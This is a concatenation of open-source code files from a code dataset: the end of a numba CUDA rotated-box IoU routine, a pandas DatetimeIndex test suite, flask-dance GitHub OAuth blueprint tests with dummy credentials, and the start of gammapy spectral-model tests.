d[0] = pts2[2 * ((j + 1) % 4)]
d[1] = pts2[2 * ((j + 1) % 4) + 1]
area_abc = trangle_area(a, b, c)
area_abd = trangle_area(a, b, d)
if area_abc * area_abd >= 0:
return False
area_cda = trangle_area(c, d, a)
area_cdb = area_cda + area_abc - area_abd
if area_cda * area_cdb >= 0:
return False
t = area_cda / (area_abd - area_abc)
dx = t * (b[0] - a[0])
dy = t * (b[1] - a[1])
temp_pts[0] = a[0] + dx
temp_pts[1] = a[1] + dy
return True
@cuda.jit('(float32, float32, float32[:])', device=True, inline=True)
def point_in_quadrilateral(pt_x, pt_y, corners):
ab0 = corners[2] - corners[0]
ab1 = corners[3] - corners[1]
ad0 = corners[6] - corners[0]
ad1 = corners[7] - corners[1]
ap0 = pt_x - corners[0]
ap1 = pt_y - corners[1]
abab = ab0 * ab0 + ab1 * ab1
abap = ab0 * ap0 + ab1 * ap1
adad = ad0 * ad0 + ad1 * ad1
adap = ad0 * ap0 + ad1 * ap1
return abab >= abap and abap >= 0 and adad >= adap and adap >= 0
@cuda.jit('(float32[:], float32[:], float32[:])', device=True, inline=True)
def quadrilateral_intersection(pts1, pts2, int_pts):
num_of_inter = 0
for i in range(4):
if point_in_quadrilateral(pts1[2 * i], pts1[2 * i + 1], pts2):
int_pts[num_of_inter * 2] = pts1[2 * i]
int_pts[num_of_inter * 2 + 1] = pts1[2 * i + 1]
num_of_inter += 1
if point_in_quadrilateral(pts2[2 * i], pts2[2 * i + 1], pts1):
int_pts[num_of_inter * 2] = pts2[2 * i]
int_pts[num_of_inter * 2 + 1] = pts2[2 * i + 1]
num_of_inter += 1
temp_pts = cuda.local.array((2, ), dtype=numba.float32)
for i in range(4):
for j in range(4):
has_pts = line_segment_intersection(pts1, pts2, i, j, temp_pts)
if has_pts:
int_pts[num_of_inter * 2] = temp_pts[0]
int_pts[num_of_inter * 2 + 1] = temp_pts[1]
num_of_inter += 1
return num_of_inter
@cuda.jit('(float32[:], float32[:])', device=True, inline=True)
def rbbox_to_corners(corners, rbbox):
# generate clockwise corners and rotate it clockwise
angle = rbbox[4]
a_cos = math.cos(angle)
a_sin = math.sin(angle)
center_x = rbbox[0]
center_y = rbbox[1]
x_d = rbbox[2]
y_d = rbbox[3]
corners_x = cuda.local.array((4, ), dtype=numba.float32)
corners_y = cuda.local.array((4, ), dtype=numba.float32)
corners_x[0] = -x_d / 2
corners_x[1] = -x_d / 2
corners_x[2] = x_d / 2
corners_x[3] = x_d / 2
corners_y[0] = -y_d / 2
corners_y[1] = y_d / 2
corners_y[2] = y_d / 2
corners_y[3] = -y_d / 2
for i in range(4):
corners[2 *
i] = a_cos * corners_x[i] + a_sin * corners_y[i] + center_x
corners[2 * i
+ 1] = -a_sin * corners_x[i] + a_cos * corners_y[i] + center_y
@cuda.jit('(float32[:], float32[:])', device=True, inline=True)
def inter(rbbox1, rbbox2):
corners1 = cuda.local.array((8, ), dtype=numba.float32)
corners2 = cuda.local.array((8, ), dtype=numba.float32)
intersection_corners = cuda.local.array((16, ), dtype=numba.float32)
rbbox_to_corners(corners1, rbbox1)
rbbox_to_corners(corners2, rbbox2)
num_intersection = quadrilateral_intersection(corners1, corners2,
intersection_corners)
sort_vertex_in_convex_polygon(intersection_corners, num_intersection)
# print(intersection_corners.reshape([-1, 2])[:num_intersection])
return area(intersection_corners, num_intersection)
@cuda.jit('(float32[:], float32[:], int32)', device=True, inline=True)
def devRotateIoUEval(rbox1, rbox2, criterion=-1):
area1 = rbox1[2] * rbox1[3]
area2 = rbox2[2] * rbox2[3]
area_inter = inter(rbox1, rbox2)
if criterion == -1:
return area_inter / (area1 + area2 - area_inter)
elif criterion == 0:
return area_inter / area1
elif criterion == 1:
return area_inter / area2
else:
return area_inter
@cuda.jit('(int64, int64, float32[:], float32[:], float32[:], int32)', fastmath=False)
def rotate_iou_kernel_eval(N, K, dev_boxes, dev_query_boxes, dev_iou, criterion=-1):
threadsPerBlock = 8 * 8
row_start = cuda.blockIdx.x
col_start = cuda.blockIdx.y
tx = cuda.threadIdx.x
row_size = min(N - row_start * threadsPerBlock, threadsPerBlock)
col_size = min(K - col_start * threadsPerBlock, threadsPerBlock)
block_boxes = cuda.shared.array(shape=(64 * 5, ), dtype=numba.float32)
block_qboxes = cuda.shared.array(shape=(64 * 5, ), dtype=numba.float32)
dev_query_box_idx = threadsPerBlock * col_start + tx
dev_box_idx = threadsPerBlock * row_start + tx
if (tx < col_size):
block_qboxes[tx * 5 + 0] = dev_query_boxes[dev_query_box_idx * 5 + 0]
block_qboxes[tx * 5 + 1] = dev_query_boxes[dev_query_box_idx * 5 + 1]
block_qboxes[tx * 5 + 2] = dev_query_boxes[dev_query_box_idx * 5 + 2]
block_qboxes[tx * 5 + 3] = dev_query_boxes[dev_query_box_idx * 5 + 3]
block_qboxes[tx * 5 + 4] = dev_query_boxes[dev_query_box_idx * 5 + 4]
if (tx < row_size):
block_boxes[tx * 5 + 0] = dev_boxes[dev_box_idx * 5 + 0]
block_boxes[tx * 5 + 1] = dev_boxes[dev_box_idx * 5 + 1]
block_boxes[tx * 5 + 2] = dev_boxes[dev_box_idx * 5 + 2]
block_boxes[tx * 5 + 3] = dev_boxes[dev_box_idx * 5 + 3]
block_boxes[tx * 5 + 4] = dev_boxes[dev_box_idx * 5 + 4]
cuda.syncthreads()
if tx < row_size:
for i in range(col_size):
offset = row_start * threadsPerBlock * K + col_start * threadsPerBlock + tx * K + i
dev_iou[offset] = devRotateIoUEval(block_qboxes[i * 5:i * 5 + 5],
block_boxes[tx * 5:tx * 5 + 5], criterion)
def rotate_iou_gpu_eval(boxes, query_boxes, criterion=-1, device_id=0):
"""rotated box iou running in gpu. 500x faster than cpu version
(take 5ms in one example with numba.cuda code).
convert from [this project](
https://github.com/hongzhenwang/RRPN-revise/tree/master/pcdet/rotation).
Args:
boxes (float tensor: [N, 5]): rbboxes. format: centers, dims,
angles(clockwise when positive)
query_boxes (float tensor: [K, 5]): [description]
device_id (int, optional): Defaults to 0. [description]
Returns:
[type]: [description]
"""
box_dtype = boxes.dtype
boxes = boxes.astype(np.float32)
query_boxes = query_boxes.astype(np.float32)
N = boxes.shape[0]
K = query_boxes.shape[0]
iou = np.zeros((N, K), dtype=np.float32)
if N == 0 or K == 0:
return iou
threadsPerBlock = 8 * 8
cuda.select_device(device_id)
blockspergrid = (div_up(N, threadsPerBlock), div_up(K, threadsPerBlock))
stream = cuda.stream()
with stream.auto_synchronize():
boxes_dev = cuda.to_device(boxes.reshape([-1]), stream)
query_boxes_dev = cuda.to_device(query_boxes.reshape([-1]), stream)
iou_dev = cuda.to_device(iou.reshape([-1]), stream)
rotate_iou_kernel_eval[blockspergrid, threadsPerBlock, stream](
N, K, boxes_dev, query_boxes_dev, iou_dev, criterion)
iou_dev.copy_to_host(iou.reshape([-1]), stream=stream)
return iou.astype(boxes.dtype)
|
the-stack_0_25204
|
from datetime import date
import dateutil
import numpy as np
import pytest
import pandas as pd
from pandas import DataFrame, DatetimeIndex, Index, Timestamp, date_range, offsets
import pandas._testing as tm
randn = np.random.randn
class TestDatetimeIndex:
def test_roundtrip_pickle_with_tz(self):
# GH 8367
# round-trip of timezone
index = date_range("20130101", periods=3, tz="US/Eastern", name="foo")
unpickled = tm.round_trip_pickle(index)
tm.assert_index_equal(index, unpickled)
def test_reindex_preserves_tz_if_target_is_empty_list_or_array(self):
# GH7774
index = date_range("20130101", periods=3, tz="US/Eastern")
assert str(index.reindex([])[0].tz) == "US/Eastern"
assert str(index.reindex(np.array([]))[0].tz) == "US/Eastern"
def test_time_loc(self): # GH8667
from datetime import time
from pandas._libs.index import _SIZE_CUTOFF
ns = _SIZE_CUTOFF + np.array([-100, 100], dtype=np.int64)
key = time(15, 11, 30)
start = key.hour * 3600 + key.minute * 60 + key.second
step = 24 * 3600
for n in ns:
idx = pd.date_range("2014-11-26", periods=n, freq="S")
ts = pd.Series(np.random.randn(n), index=idx)
i = np.arange(start, n, step)
tm.assert_numpy_array_equal(ts.index.get_loc(key), i, check_dtype=False)
tm.assert_series_equal(ts[key], ts.iloc[i])
left, right = ts.copy(), ts.copy()
left[key] *= -10
right.iloc[i] *= -10
tm.assert_series_equal(left, right)
def test_time_overflow_for_32bit_machines(self):
# GH8943. On some machines NumPy defaults to np.int32 (for example,
# 32-bit Linux machines). In the function _generate_regular_range
# found in tseries/index.py, `periods` gets multiplied by `strides`
# (which has value 1e9) and since the max value for np.int32 is ~2e9,
# and since those machines won't promote np.int32 to np.int64, we get
# overflow.
periods = np.int_(1000)
idx1 = pd.date_range(start="2000", periods=periods, freq="S")
assert len(idx1) == periods
idx2 = pd.date_range(end="2000", periods=periods, freq="S")
assert len(idx2) == periods
def test_nat(self):
assert DatetimeIndex([np.nan])[0] is pd.NaT
def test_week_of_month_frequency(self):
# GH 5348: "ValueError: Could not evaluate WOM-1SUN" shouldn't raise
d1 = date(2002, 9, 1)
d2 = date(2013, 10, 27)
d3 = date(2012, 9, 30)
idx1 = DatetimeIndex([d1, d2])
idx2 = DatetimeIndex([d3])
result_append = idx1.append(idx2)
expected = DatetimeIndex([d1, d2, d3])
tm.assert_index_equal(result_append, expected)
result_union = idx1.union(idx2)
expected = DatetimeIndex([d1, d3, d2])
tm.assert_index_equal(result_union, expected)
# GH 5115
result = date_range("2013-1-1", periods=4, freq="WOM-1SAT")
dates = ["2013-01-05", "2013-02-02", "2013-03-02", "2013-04-06"]
expected = DatetimeIndex(dates, freq="WOM-1SAT")
tm.assert_index_equal(result, expected)
def test_hash_error(self):
index = date_range("20010101", periods=10)
with pytest.raises(
TypeError, match=f"unhashable type: '{type(index).__name__}'"
):
hash(index)
def test_stringified_slice_with_tz(self):
# GH#2658
start = "2013-01-07"
idx = date_range(start=start, freq="1d", periods=10, tz="US/Eastern")
df = DataFrame(np.arange(10), index=idx)
df["2013-01-14 23:44:34.437768-05:00":] # no exception here
def test_append_nondatetimeindex(self):
rng = date_range("1/1/2000", periods=10)
idx = Index(["a", "b", "c", "d"])
result = rng.append(idx)
assert isinstance(result[0], Timestamp)
def test_map(self):
rng = date_range("1/1/2000", periods=10)
f = lambda x: x.strftime("%Y%m%d")
result = rng.map(f)
exp = Index([f(x) for x in rng], dtype="<U8")
tm.assert_index_equal(result, exp)
def test_map_fallthrough(self, capsys):
# GH#22067, check we don't get warnings about silently ignored errors
dti = date_range("2017-01-01", "2018-01-01", freq="B")
dti.map(lambda x: pd.Period(year=x.year, month=x.month, freq="M"))
captured = capsys.readouterr()
assert captured.err == ""
def test_iteration_preserves_tz(self):
# see gh-8890
index = date_range("2012-01-01", periods=3, freq="H", tz="US/Eastern")
for i, ts in enumerate(index):
result = ts
expected = index[i]
assert result == expected
index = date_range(
"2012-01-01", periods=3, freq="H", tz=dateutil.tz.tzoffset(None, -28800)
)
for i, ts in enumerate(index):
result = ts
expected = index[i]
assert result._repr_base == expected._repr_base
assert result == expected
# 9100
index = pd.DatetimeIndex(
["2014-12-01 03:32:39.987000-08:00", "2014-12-01 04:12:34.987000-08:00"]
)
for i, ts in enumerate(index):
result = ts
expected = index[i]
assert result._repr_base == expected._repr_base
assert result == expected
@pytest.mark.parametrize("periods", [0, 9999, 10000, 10001])
def test_iteration_over_chunksize(self, periods):
# GH21012
index = date_range("2000-01-01 00:00:00", periods=periods, freq="min")
num = 0
for stamp in index:
assert index[num] == stamp
num += 1
assert num == len(index)
def test_misc_coverage(self):
rng = date_range("1/1/2000", periods=5)
result = rng.groupby(rng.day)
assert isinstance(list(result.values())[0][0], Timestamp)
idx = DatetimeIndex(["2000-01-03", "2000-01-01", "2000-01-02"])
assert not idx.equals(list(idx))
non_datetime = Index(list("abc"))
assert not idx.equals(list(non_datetime))
def test_string_index_series_name_converted(self):
# #1644
df = DataFrame(np.random.randn(10, 4), index=date_range("1/1/2000", periods=10))
result = df.loc["1/3/2000"]
assert result.name == df.index[2]
result = df.T["1/3/2000"]
assert result.name == df.index[2]
def test_argmin_argmax(self):
idx = DatetimeIndex(["2000-01-04", "2000-01-01", "2000-01-02"])
assert idx.argmin() == 1
assert idx.argmax() == 0
def test_sort_values(self):
idx = DatetimeIndex(["2000-01-04", "2000-01-01", "2000-01-02"])
ordered = idx.sort_values()
assert ordered.is_monotonic
ordered = idx.sort_values(ascending=False)
assert ordered[::-1].is_monotonic
ordered, dexer = idx.sort_values(return_indexer=True)
assert ordered.is_monotonic
tm.assert_numpy_array_equal(dexer, np.array([1, 2, 0], dtype=np.intp))
ordered, dexer = idx.sort_values(return_indexer=True, ascending=False)
assert ordered[::-1].is_monotonic
tm.assert_numpy_array_equal(dexer, np.array([0, 2, 1], dtype=np.intp))
def test_map_bug_1677(self):
index = DatetimeIndex(["2012-04-25 09:30:00.393000"])
f = index.asof
result = index.map(f)
expected = Index([f(index[0])])
tm.assert_index_equal(result, expected)
def test_groupby_function_tuple_1677(self):
df = DataFrame(np.random.rand(100), index=date_range("1/1/2000", periods=100))
monthly_group = df.groupby(lambda x: (x.year, x.month))
result = monthly_group.mean()
assert isinstance(result.index[0], tuple)
def test_append_numpy_bug_1681(self):
# another datetime64 bug
dr = date_range("2011/1/1", "2012/1/1", freq="W-FRI")
a = DataFrame()
c = DataFrame({"A": "foo", "B": dr}, index=dr)
result = a.append(c)
assert (result["B"] == dr).all()
def test_isin(self):
index = tm.makeDateIndex(4)
result = index.isin(index)
assert result.all()
result = index.isin(list(index))
assert result.all()
tm.assert_almost_equal(
index.isin([index[2], 5]), np.array([False, False, True, False])
)
def assert_index_parameters(self, index):
assert index.freq == "40960N"
assert index.inferred_freq == "40960N"
def test_ns_index(self):
nsamples = 400
ns = int(1e9 / 24414)
dtstart = np.datetime64("2012-09-20T00:00:00")
dt = dtstart + np.arange(nsamples) * np.timedelta64(ns, "ns")
freq = ns * offsets.Nano()
index = pd.DatetimeIndex(dt, freq=freq, name="time")
self.assert_index_parameters(index)
new_index = pd.date_range(start=index[0], end=index[-1], freq=index.freq)
self.assert_index_parameters(new_index)
def test_factorize(self):
idx1 = DatetimeIndex(
["2014-01", "2014-01", "2014-02", "2014-02", "2014-03", "2014-03"]
)
exp_arr = np.array([0, 0, 1, 1, 2, 2], dtype=np.intp)
exp_idx = DatetimeIndex(["2014-01", "2014-02", "2014-03"])
arr, idx = idx1.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
arr, idx = idx1.factorize(sort=True)
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
# tz must be preserved
idx1 = idx1.tz_localize("Asia/Tokyo")
exp_idx = exp_idx.tz_localize("Asia/Tokyo")
arr, idx = idx1.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
idx2 = pd.DatetimeIndex(
["2014-03", "2014-03", "2014-02", "2014-01", "2014-03", "2014-01"]
)
exp_arr = np.array([2, 2, 1, 0, 2, 0], dtype=np.intp)
exp_idx = DatetimeIndex(["2014-01", "2014-02", "2014-03"])
arr, idx = idx2.factorize(sort=True)
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
exp_arr = np.array([0, 0, 1, 2, 0, 2], dtype=np.intp)
exp_idx = DatetimeIndex(["2014-03", "2014-02", "2014-01"])
arr, idx = idx2.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
# freq must be preserved
idx3 = date_range("2000-01", periods=4, freq="M", tz="Asia/Tokyo")
exp_arr = np.array([0, 1, 2, 3], dtype=np.intp)
arr, idx = idx3.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, idx3)
def test_factorize_tz(self, tz_naive_fixture):
tz = tz_naive_fixture
# GH#13750
base = pd.date_range("2016-11-05", freq="H", periods=100, tz=tz)
idx = base.repeat(5)
exp_arr = np.arange(100, dtype=np.intp).repeat(5)
for obj in [idx, pd.Series(idx)]:
arr, res = obj.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(res, base)
def test_factorize_dst(self):
# GH 13750
idx = pd.date_range("2016-11-06", freq="H", periods=12, tz="US/Eastern")
for obj in [idx, pd.Series(idx)]:
arr, res = obj.factorize()
tm.assert_numpy_array_equal(arr, np.arange(12, dtype=np.intp))
tm.assert_index_equal(res, idx)
idx = pd.date_range("2016-06-13", freq="H", periods=12, tz="US/Eastern")
for obj in [idx, pd.Series(idx)]:
arr, res = obj.factorize()
tm.assert_numpy_array_equal(arr, np.arange(12, dtype=np.intp))
tm.assert_index_equal(res, idx)
@pytest.mark.parametrize(
"arr, expected",
[
(pd.DatetimeIndex(["2017", "2017"]), pd.DatetimeIndex(["2017"])),
(
pd.DatetimeIndex(["2017", "2017"], tz="US/Eastern"),
pd.DatetimeIndex(["2017"], tz="US/Eastern"),
),
],
)
def test_unique(self, arr, expected):
result = arr.unique()
tm.assert_index_equal(result, expected)
# GH 21737
# Ensure the underlying data is consistent
assert result[0] == expected[0]
def test_asarray_tz_naive(self):
# This shouldn't produce a warning.
idx = pd.date_range("2000", periods=2)
# M8[ns] by default
result = np.asarray(idx)
expected = np.array(["2000-01-01", "2000-01-02"], dtype="M8[ns]")
tm.assert_numpy_array_equal(result, expected)
# optionally, object
result = np.asarray(idx, dtype=object)
expected = np.array([pd.Timestamp("2000-01-01"), pd.Timestamp("2000-01-02")])
tm.assert_numpy_array_equal(result, expected)
def test_asarray_tz_aware(self):
tz = "US/Central"
idx = pd.date_range("2000", periods=2, tz=tz)
expected = np.array(["2000-01-01T06", "2000-01-02T06"], dtype="M8[ns]")
result = np.asarray(idx, dtype="datetime64[ns]")
tm.assert_numpy_array_equal(result, expected)
# Old behavior with no warning
result = np.asarray(idx, dtype="M8[ns]")
tm.assert_numpy_array_equal(result, expected)
# Future behavior with no warning
expected = np.array(
[pd.Timestamp("2000-01-01", tz=tz), pd.Timestamp("2000-01-02", tz=tz)]
)
result = np.asarray(idx, dtype=object)
tm.assert_numpy_array_equal(result, expected)
def test_to_frame_datetime_tz(self):
# GH 25809
idx = date_range(start="2019-01-01", end="2019-01-30", freq="D", tz="UTC")
result = idx.to_frame()
expected = DataFrame(idx, index=idx)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("name", [None, "name"])
def test_index_map(self, name):
# see GH20990
count = 6
index = pd.date_range("2018-01-01", periods=count, freq="M", name=name).map(
lambda x: (x.year, x.month)
)
exp_index = pd.MultiIndex.from_product(
((2018,), range(1, 7)), names=[name, name]
)
tm.assert_index_equal(index, exp_index)
|
the-stack_0_25206
|
from __future__ import unicode_literals
import pytest
import responses
from urlobject import URLObject
from flask import Flask
from flask_dance.contrib.github import make_github_blueprint, github
from flask_dance.consumer import OAuth2ConsumerBlueprint
from flask_dance.consumer.storage import MemoryStorage
@pytest.fixture
def make_app():
def _make_app(*args, **kwargs):
app = Flask(__name__)
app.secret_key = "whatever"
blueprint = make_github_blueprint(*args, **kwargs)
app.register_blueprint(blueprint)
return app
return _make_app
def test_blueprint_factory():
github_bp = make_github_blueprint(
client_id="foo", client_secret="bar", scope="user:email", redirect_to="index"
)
assert isinstance(github_bp, OAuth2ConsumerBlueprint)
assert github_bp.session.scope == "user:email"
assert github_bp.session.base_url == "https://api.github.com/"
assert github_bp.session.client_id == "foo"
assert github_bp.client_secret == "bar"
assert github_bp.authorization_url == "https://github.com/login/oauth/authorize"
assert github_bp.token_url == "https://github.com/login/oauth/access_token"
def test_load_from_config(make_app):
app = make_app()
app.config["GITHUB_OAUTH_CLIENT_ID"] = "foo"
app.config["GITHUB_OAUTH_CLIENT_SECRET"] = "bar"
resp = app.test_client().get("/github")
url = resp.headers["Location"]
client_id = URLObject(url).query.dict.get("client_id")
assert client_id == "foo"
@responses.activate
def test_context_local(make_app):
responses.add(responses.GET, "https://google.com")
# set up two apps with two different set of auth tokens
app1 = make_app(
"foo1",
"bar1",
redirect_to="url1",
storage=MemoryStorage({"access_token": "app1"}),
)
app2 = make_app(
"foo2",
"bar2",
redirect_to="url2",
storage=MemoryStorage({"access_token": "app2"}),
)
# outside of a request context, referencing functions on the `github` object
# will raise an exception
with pytest.raises(RuntimeError):
github.get("https://google.com")
# inside of a request context, `github` should be a proxy to the correct
# blueprint session
with app1.test_request_context("/"):
app1.preprocess_request()
github.get("https://google.com")
request = responses.calls[0].request
assert request.headers["Authorization"] == "Bearer app1"
with app2.test_request_context("/"):
app2.preprocess_request()
github.get("https://google.com")
request = responses.calls[1].request
assert request.headers["Authorization"] == "Bearer app2"
|
the-stack_0_25207
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import operator
import pytest
import numpy as np
from numpy.testing import assert_allclose
import astropy.units as u
from gammapy.maps import MapAxis
from gammapy.modeling.models import (
SPECTRAL_MODEL_REGISTRY,
BrokenPowerLawSpectralModel,
CompoundSpectralModel,
ConstantSpectralModel,
EBLAbsorptionNormSpectralModel,
ExpCutoffPowerLaw3FGLSpectralModel,
ExpCutoffPowerLawNormSpectralModel,
ExpCutoffPowerLawSpectralModel,
GaussianSpectralModel,
LogParabolaNormSpectralModel,
LogParabolaSpectralModel,
NaimaSpectralModel,
PiecewiseNormSpectralModel,
PowerLaw2SpectralModel,
PowerLawNormSpectralModel,
PowerLawSpectralModel,
SmoothBrokenPowerLawSpectralModel,
SuperExpCutoffPowerLaw4FGLSpectralModel,
TemplateSpectralModel,
)
from gammapy.utils.testing import (
assert_quantity_allclose,
mpl_plot_check,
requires_data,
requires_dependency,
)
def table_model():
energy = MapAxis.from_energy_bounds(0.1 * u.TeV, 100 * u.TeV, 1000).center
model = PowerLawSpectralModel(
index=2.3, amplitude="4 cm-2 s-1 TeV-1", reference="1 TeV"
)
dnde = model(energy)
return TemplateSpectralModel(energy, dnde)
TEST_MODELS = [
dict(
name="powerlaw",
model=PowerLawSpectralModel(
index=2.3 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
),
val_at_2TeV=u.Quantity(4 * 2.0 ** (-2.3), "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(2.9227116204223784, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(6.650836884969039, "TeV cm-2 s-1"),
),
dict(
name="powerlaw",
model=PowerLawSpectralModel(
index=2 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
),
val_at_2TeV=u.Quantity(1.0, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(3.6, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(9.210340371976184, "TeV cm-2 s-1"),
),
dict(
name="norm-powerlaw",
model=PowerLawNormSpectralModel(
tilt=2 * u.Unit(""), norm=4.0 * u.Unit(""), reference=1 * u.TeV,
),
val_at_2TeV=u.Quantity(1.0, ""),
integral_1_10TeV=u.Quantity(3.6, "TeV"),
eflux_1_10TeV=u.Quantity(9.210340371976184, "TeV2"),
),
dict(
name="powerlaw2",
model=PowerLaw2SpectralModel(
amplitude=u.Quantity(2.9227116204223784, "cm-2 s-1"),
index=2.3 * u.Unit(""),
emin=1 * u.TeV,
emax=10 * u.TeV,
),
val_at_2TeV=u.Quantity(4 * 2.0 ** (-2.3), "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(2.9227116204223784, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(6.650836884969039, "TeV cm-2 s-1"),
),
dict(
name="ecpl",
model=ExpCutoffPowerLawSpectralModel(
index=1.6 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
lambda_=0.1 / u.TeV,
),
val_at_2TeV=u.Quantity(1.080321705479446, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(3.765838739678921, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(9.901735870666526, "TeV cm-2 s-1"),
e_peak=4 * u.TeV,
),
dict(
name="norm-ecpl",
model=ExpCutoffPowerLawNormSpectralModel(
index=1.6 * u.Unit(""),
norm=4 * u.Unit(""),
reference=1 * u.TeV,
lambda_=0.1 / u.TeV,
),
val_at_2TeV=u.Quantity(1.080321705479446, ""),
integral_1_10TeV=u.Quantity(3.765838739678921, "TeV"),
eflux_1_10TeV=u.Quantity(9.901735870666526, "TeV2"),
),
dict(
name="ecpl_3fgl",
model=ExpCutoffPowerLaw3FGLSpectralModel(
index=2.3 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
ecut=10 * u.TeV,
),
val_at_2TeV=u.Quantity(0.7349563611124971, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(2.6034046173089, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(5.340285560055799, "TeV cm-2 s-1"),
),
dict(
name="plsec_4fgl",
model=SuperExpCutoffPowerLaw4FGLSpectralModel(
index_1=1.5,
index_2=2,
amplitude=1 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
expfactor=1e-2,
),
val_at_2TeV=u.Quantity(0.3431043087721737, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(1.2125247, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(3.38072082, "TeV cm-2 s-1"),
),
dict(
name="logpar",
model=LogParabolaSpectralModel(
alpha=2.3 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
beta=0.5 * u.Unit(""),
),
val_at_2TeV=u.Quantity(0.6387956571420305, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(2.255689748270628, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(3.9586515834989267, "TeV cm-2 s-1"),
e_peak=0.74082 * u.TeV,
),
dict(
name="norm-logpar",
model=LogParabolaNormSpectralModel(
alpha=2.3 * u.Unit(""),
norm=4 * u.Unit(""),
reference=1 * u.TeV,
beta=0.5 * u.Unit(""),
),
val_at_2TeV=u.Quantity(0.6387956571420305, ""),
integral_1_10TeV=u.Quantity(2.255689748270628, "TeV"),
eflux_1_10TeV=u.Quantity(3.9586515834989267, "TeV2"),
),
dict(
name="logpar10",
model=LogParabolaSpectralModel.from_log10(
alpha=2.3 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
beta=1.151292546497023 * u.Unit(""),
),
val_at_2TeV=u.Quantity(0.6387956571420305, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(2.255689748270628, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(3.9586515834989267, "TeV cm-2 s-1"),
e_peak=0.74082 * u.TeV,
),
dict(
name="constant",
model=ConstantSpectralModel(const=4 / u.cm ** 2 / u.s / u.TeV),
val_at_2TeV=u.Quantity(4, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(35.9999999999999, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(198.00000000000006, "TeV cm-2 s-1"),
),
dict(
name="powerlaw_index1",
model=PowerLawSpectralModel(
index=1 * u.Unit(""),
amplitude=2 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
),
val_at_2TeV=u.Quantity(1.0, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(4.605170185, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(18.0, "TeV cm-2 s-1"),
),
dict(
name="ecpl_2",
model=ExpCutoffPowerLawSpectralModel(
index=2.0 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
lambda_=0.1 / u.TeV,
),
val_at_2TeV=u.Quantity(0.81873075, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(2.83075297, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(6.41406327, "TeV cm-2 s-1"),
e_peak=np.nan * u.TeV,
),
dict(
name="GaussianSpectralModel",
model=GaussianSpectralModel(
norm=4 / u.cm ** 2 / u.s, mean=2 * u.TeV, sigma=0.2 * u.TeV
),
val_at_2TeV=u.Quantity(7.978845608028654, "cm-2 s-1 TeV-1"),
val_at_3TeV=u.Quantity(2.973439029468601e-05, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(3.9999988533937123, "cm-2 s-1"),
integral_infinity=u.Quantity(4, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(7.999998896163037, "TeV cm-2 s-1"),
),
dict(
name="ecpl",
model=ExpCutoffPowerLawSpectralModel(
index=1.8 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
lambda_=0.1 / u.TeV,
alpha=0.8,
),
val_at_2TeV=u.Quantity(0.871694294554192, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(3.026342, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(7.38652453, "TeV cm-2 s-1"),
e_peak=1.7677669529663684 * u.TeV,
),
dict(
name="bpl",
model=BrokenPowerLawSpectralModel(
index1=1.5 * u.Unit(""),
index2=2.5 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
ebreak=0.5 * u.TeV,
),
val_at_2TeV=u.Quantity(0.125, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(0.45649740094103286, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(0.9669999668731384, "TeV cm-2 s-1"),
),
dict(
name="sbpl",
model=SmoothBrokenPowerLawSpectralModel(
index1=1.5 * u.Unit(""),
index2=2.5 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
ebreak=0.5 * u.TeV,
reference=1 * u.TeV,
beta=1,
),
